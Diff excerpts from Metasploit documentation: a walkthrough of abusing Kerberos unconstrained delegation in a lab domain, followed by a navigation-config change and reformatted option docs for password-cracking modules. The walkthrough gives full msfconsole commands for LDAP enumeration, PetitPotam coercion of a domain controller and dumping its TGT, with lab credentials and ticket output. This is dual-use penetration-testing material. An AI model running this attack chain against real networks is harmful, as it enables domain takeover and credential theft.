+The unconstrained delegation setting is stored as a bit flag in the `userAccountControl` LDAP attribute. A domain 
+account can be used with the `auxiliary/gather/ldap_query` module to identify computer accounts configured for
+unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation
+and should be ignored as targets.
+
+Use the `ENUM_UNCONSTRAINED_DELEGATION` action to enumerate targets:
+```
+msf6 > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(gather/ldap_query) > set DOMAIN msflab.local
+DOMAIN => msflab.local
+msf6 auxiliary(gather/ldap_query) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 auxiliary(gather/ldap_query) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION 
+ACTION => ENUM_UNCONSTRAINED_DELEGATION
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local
+CN=WS01 CN=Computers DC=msflab DC=local
+=======================================
+
+ Name            Attributes
+ ----            ----------
+ cn              WS01
+ objectcategory  CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local
+ samaccountname  WS01$
+
+CN=DC OU=Domain Controllers DC=msflab DC=local
+==============================================
+
+ Name            Attributes
+ ----            ----------
+ cn              DC
+ memberof        CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local
+ objectcategory  CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local
+ samaccountname  DC$
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+This results in two potential targets, WS01 and DC. Next, use the `ENUM_DOMAIN_CONTROLLERS` action to identify the
+domain controllers to remove from the list of potential targets.
+
+```
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS 
+ACTION => ENUM_DOMAIN_CONTROLLERS
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local
+CN=DC OU=Domain Controllers DC=msflab DC=local
+==============================================
+
+ Name                    Attributes
+ ----                    ----------
+ distinguishedname       CN=DC,OU=Domain Controllers,DC=msflab,DC=local
+ dnshostname             DC.msflab.local
+ name                    DC
+ operatingsystem         Windows Server 2019 Standard
+ operatingsystemversion  10.0 (17763)
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
+
+This shows that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target.
+
+### Exploitation
+Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter
+session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The 
+`auxiliary/scanner/dcerpc/petitpotam` module can be used for this purpose. Use the module, and take care to set the
+`LISTENER` option to **the hostname of the compromised host**. The hostname must be used and not an IP address. Set the
+remaining options including `RHOSTS` to the domain controller, and `SMBUser` / `SMBPass` to the credentials of the
+compromised domain account.
+
+```
+msf6 > use auxiliary/scanner/dcerpc/petitpotam 
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local
+LISTENER => ws01.msflab.local
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(scanner/dcerpc/petitpotam) > run
+
+[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
+[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/petitpotam) >
+```
+
+If the module does not indicate that the attack was successful, another tool like
+[`Coercer`](https://github.com/p0dalirius/Coercer) can be used to try additional methods.
+
+Now that the domain controller has authenticated to the target it's necessary to dump the kerberos tickets from the
+compromised target. Use the `post/windows/manage/kerberos_tickets` module and the `DUMP_TICKETS` action to dump the TGTs
+from the compromised host. If the attack was successful there should be at least one TGT from the domain controller's
+computer account.
+
+```
+msf6 > use post/windows/manage/kerberos_tickets 
+msf6 post(windows/manage/kerberos_tickets) > set SESSION -1
+SESSION => -1
+msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
+SERVICE => krbtgt/*
+msf6 post(windows/manage/kerberos_tickets) > run
+
+[*] LSA Handle: 0x000001efe1c415a0
+[*] LogonSession LUID: 0x00004bc1d 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:33:17 -0400
+[*]   Ticket[0]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 08:33:17 -0400
+              End time: 2023-08-23 18:33:17 -0400
+              Renew Till: 2023-08-30 08:33:17 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
+[*] LogonSession LUID: 0x00001052b 
+[*]   User:                  Window Manager\DWM-1
+[*]   Session:               1
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:32:38 -0400
+
+... omitted for brevity ...
+```
+
+In this case, a TGT for the `MSFLAB\DC$` account was obtained through the logon session with LUID `0x00004bc1d`. The
+ticket was stored to disk in a ccache file. The ticket can also be seen in the output of `klist`.
+
+```
+msf6 post(windows/manage/kerberos_tickets) > klist
+Kerberos Cache
+==============
+id   host            principal               sname                             issued                     status  path
+--   ----            ---------               -----                             ------                     ------  ----
+411  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 09:32:46 -0400  active  /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin
+407  192.168.159.10  WS01$@MSFLAB.LOCAL      krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 15:14:46 -0400  active  /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin
+
+msf6 post(windows/manage/kerberos_tickets) > 
+```
+
+### Using The Ticket
+Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby
+the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to
+use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain
+controller.
@@ -186,7 +186,11 @@ NAVIGATION_CONFIG = [
              },
              {
                path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
-                title: 'RBCD - Resource-based constrained delegation'
+                title: 'Resource-based constrained delegation (RBCD)'
+              },
+              {
+                path: 'kerberos/unconstrained_delegation.md',
+                title: 'Unconstrained delegation'
              }
            ]
          },
@@ -321,6 +325,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'Metasploit-Web-Service.md'
          },
+          {
+            path: 'How-to-Configure-DNS.md'
+          },
          {
            title: 'Meterpreter',
            folder: 'meterpreter',
@@ -11,28 +11,36 @@
  4. Do: ```run```
  5. You should hopefully crack a password.

+## Actions
+
+### john
+
+Use john the ripper (default).
+
+### hashcat
+
+Use hashcat.
+
 ## Options

+### CONFIG

-   **CONFIG**
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+### JOHN_PATH

-   **JOHN_PATH**
+The absolute path to the John the Ripper executable.  Default behavior is to search `path` for `john` and `john.exe`.

-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
+### POT

-   **POT**
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+### DeleteTempFiles

-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

 ## Scenarios

@@ -8,7 +8,7 @@
  Formats:

 | Common | John     | Hashcat |
-|--------| ---------|---------|
+| ------ | -------- | ------- |
 | des    | descript | 1500    |

  Sources of hashes can be found here:
@@ -25,55 +25,54 @@

 ## Actions

-   **john**
+### john

-   Use john the ripper (default).
+Use john the ripper (default).

-   **hashcat**
+### hashcat

-   Use hashcat.
+Use hashcat.

 ## Options

+### CONFIG

-   **CONFIG**
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+### CRACKER_PATH

-   **CRACKER_PATH**
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+### CUSTOM_WORDLIST

-   **CUSTOM_WORDLIST**
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+### DeleteTempFiles

-   **DeleteTempFiles**
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+### Fork

-   **Fork**
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+### INCREMENTAL

-   **INCREMENTAL**
+Run the cracker in incremental mode.  Default is `true`

-   Run the cracker in incremental mode.  Default is `true`
+### ITERATION_TIMEOUT

-   **ITERATION_TIMEOUT**
+The max-run-time for each iteration of cracking

-   The max-run-time for each iteration of cracking
+### KORELOGIC

-   **KORELOGIC**
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+### MUTATE

-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -83,44 +82,44 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **POT**
+### POT

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **SHOWCOMMAND**
+### SHOWCOMMAND

-   Show the command being used run from the command line for debugging.  Default is `false`
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_CREDS**
+### USE_CREDS

-   Use existing credential data saved in the database.  Default is `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_DB_INFO**
+### USE_DB_INFO

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_DEFAULT_WORDLIST**
+### USE_DEFAULT_WORDLIST

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **USE_HOSTNAMES**
+### USE_HOSTNAMES

-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+Seed the wordlist with hostnames from the workspace.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_ROOT_WORDS

   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
   is true.

-   **WORDLIST**
+### WORDLIST

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Run the cracker in dictionary/wordlist mode.  Default is `true`

 ## Scenarios

@@ -18,7 +18,7 @@


 | Common         | John        | Hashcat |
-|----------------|-------------|---------|
+| -------------- | ----------- | ------- |
 | mysql          | mysql       | 200     |
 | mysql-sha1     | mysql-sha1  | 300     |
 | mssql          | mssql       | 131     |
@@ -43,62 +43,62 @@

 ## Actions

-   **john**
+### john

-   Use john the ripper (default).
+Use john the ripper (default).

-   **hashcat**
+### hashcat

-   Use hashcat.
+Use hashcat.

 ## Options

-   **CONFIG**
+### CONFIG

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

-   **CRACKER_PATH**
+### CRACKER_PATH

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   **CUSTOM_WORDLIST**
+### CUSTOM_WORDLIST

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   **DeleteTempFiles**
+### DeleteTempFiles

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   **Fork**
+### Fork

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   **INCREMENTAL**
+### INCREMENTAL

-   Run the cracker in incremental mode.  Default is `true`
+Run the cracker in incremental mode.  Default is `true`

-   **ITERATION_TIMEOUT**
+### ITERATION_TIMEOUT

-   The max-run-time for each iteration of cracking.
+The max-run-time for each iteration of cracking.

-   **KORELOGIC**
+### KORELOGIC

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   **MSSQL**
+### MSSQL

-   Crack MSSQL hashes. Default is `true`.
+Crack MSSQL hashes. Default is `true`.

-   **MYSQL**
+### MYSQL

-   Crack MySQL hashes. Default is `true`.
+Crack MySQL hashes. Default is `true`.

-   **MUTATE**
+### MUTATE

-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -108,53 +108,53 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **ORACLE**
+### ORACLE

-   Crack oracle hashes. Default is `true`.
+Crack oracle hashes. Default is `true`.


-   **POSTGRES**
+### POSTGRES

-   Crack postgres hashes. Default is `true`.
+Crack postgres hashes. Default is `true`.

-   **POT**
+### POT

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **SHOWCOMMAND**
+### SHOWCOMMAND

-   Show the command being used run from the command line for debugging.  Default is `false`
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_CREDS**
+### USE_CREDS

-   Use existing credential data saved in the database.  Default is `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_DB_INFO**
+### USE_DB_INFO

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_DEFAULT_WORDLIST**
+### USE_DEFAULT_WORDLIST

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **USE_HOSTNAMES**
+### USE_HOSTNAMES

-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+Seed the wordlist with hostnames from the workspace.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_ROOT_WORDS

-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
+Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+is true.

-   **WORDLIST**
+### WORDLIST

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Run the cracker in dictionary/wordlist mode.  Default is `true`

 ## Scenarios

@@ -11,7 +11,7 @@
  * `SHA512` based passwords

 | Common   | John        | Hashcat |
-|----------|-------------|-------- |
+| -------- | ----------- | ------- |
 | des      | descript    | 1500    |
 | md5      | md5crypt    | 500     |
 | bsdi     | bsdicrypt   | 12400   |
@@ -33,71 +33,70 @@

 ## Actions

-   **john**
+### john

-   Use john the ripper (default).
+Use john the ripper (default).

-   **hashcat**
+### hashcat

-   Use hashcat.
+Use hashcat.

 ## Options

-   **BLOWFISH**
+### BLOWFISH

-   Crack Blowfish hashes. Default is `false`.
+Crack Blowfish hashes. Default is `false`.

-   **BSDi**
+### BSDi

-   Crack BSDi hashes. Default is `true`.
+Crack BSDi hashes. Default is `true`.

-   **CONFIG**
+### CONFIG

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

+### CRACKER_PATH

-   **CRACKER_PATH**
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+### CUSTOM_WORDLIST

-   **CUSTOM_WORDLIST**
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+### DES

-   **DES**
+Crack DES hashes. Default is `true`.

-   Crack DES hashes. Default is `true`.
+### DeleteTempFiles

-   **DeleteTempFiles**
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+### Fork

-   **Fork**
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+### INCREMENTAL

-   **INCREMENTAL**
+Run the cracker in incremental mode.  Default is `true`

-   Run the cracker in incremental mode.  Default is `true`
+### ITERATION_TIMEOUT

-   **ITERATION_TIMEOUT**
+The max-run-time for each iteration of cracking.

-   The max-run-time for each iteration of cracking.
+### KORELOGIC

-   **KORELOGIC**
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+### MD5

-   **MD5**
+Crack MD5 hashes. Default is `true`.

-   Crack MD5 hashes. Default is `true`.
+### MUTATE

-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -107,52 +106,52 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **POT**
+### POT

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **SHA256**
+### SHA256

-   Crack SHA256 hashes. Default is `false`.
+Crack SHA256 hashes. Default is `false`.

-   **SHA512**
+### SHA512

-   Crack SHA12 hashes. Default is `false`.
+Crack SHA12 hashes. Default is `false`.

-   **SHOWCOMMAND**
+### SHOWCOMMAND

-   Show the command being used run from the command line for debugging.  Default is `false`
+Show the command being used run from the command line for debugging.  Default is `false`

-   **USE_CREDS**
+### USE_CREDS

-   Use existing credential data saved in the database.  Default is `true`.
+Use existing credential data saved in the database.  Default is `true`.

-   **USE_DB_INFO**
+### USE_DB_INFO

-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.

-   **USE_DEFAULT_WORDLIST**
+### USE_DEFAULT_WORDLIST

-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
+Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+`true`.

-   **USE_HOSTNAMES**
+### USE_HOSTNAMES

-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+Seed the wordlist with hostnames from the workspace.  Default is `true`.

-   **USE_ROOT_WORDS**
+### USE_ROOT_WORDS

-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
+Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+is true.

-   **WORDLIST**
+### WORDLIST

-   Run the cracker in dictionary/wordlist mode.  Default is `true`
+Run the cracker in dictionary/wordlist mode.  Default is `true`

 ## Scenarios

@@ -10,7 +10,7 @@
  Formats:

 | Common               | John | Hashcat |
-|----------------------| -----|---------|
+| -------------------- | ---- | ------- |
 | android-md5          | n/a  | 10      |
 | android-samsung-sha1 | n/a  | 5800    |
 | android-sha1         | n/a  | 110     |
@@ -29,62 +29,62 @@

 ## Actions

-   **hashcat**
+### hashcat

-   Use hashcat (default).
+Use hashcat (default).

 ## Options

-   **MD5**
+### MD5

-   Crack `android-md5` based passwords.  Default is `true`
+Crack `android-md5` based passwords.  Default is `true`

-   **SHA1**
+### SHA1

-   Crack `android-sha1` (non-samsung) based passwords.  Default is `true`
+Crack `android-sha1` (non-samsung) based passwords.  Default is `true`

-   **SAMSUNG**
+### SAMSUNG

-   Crack `android-samsung-sha1` based passwords.  Default is `true`
+Crack `android-samsung-sha1` based passwords.  Default is `true`

-   **CONFIG**
+### CONFIG

-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`

-   **CRACKER_PATH**
+### CRACKER_PATH

-   The absolute path to the cracker executable.  Default behavior is to search `path`.
+The absolute path to the cracker executable.  Default behavior is to search `path`.

-   **CUSTOM_WORDLIST**
+### CUSTOM_WORDLIST

-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

-   **DeleteTempFiles**
+### DeleteTempFiles

-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.

-   **Fork**
+### Fork

-   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+This option will set how many forks to use on john the ripper.  Default is `1` (no forking).

-   **INCREMENTAL**
+### INCREMENTAL

-   Run the cracker in incremental mode.  Default is `true`
+Run the cracker in incremental mode.  Default is `true`

-   **ITERATION_TIMEOUT**
+### ITERATION_TIMEOUT

-   The max-run-time for each iteration of cracking
+The max-run-time for each iteration of cracking

-   **KORELOGIC**
+### KORELOGIC

-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
+Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+Default is `false`.

-   **MUTATE**
+### MUTATE

-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+Apply common mutations to the Wordlist (SLOW).  Mutations are:

   * `'@' => 'a'`
   * `'0' => 'o'`
@@ -94,44 +94,44 @@
   * `'1' => 'l'`
   * `'5' => 's'`

-   Default is `false`.
+Default is `false`.

-   **POT**
+### POT

-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
+The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+Default is `~/.msf4/john.pot`.

-   **SHOWCOMMAND**
+### SHOWCOMMAND

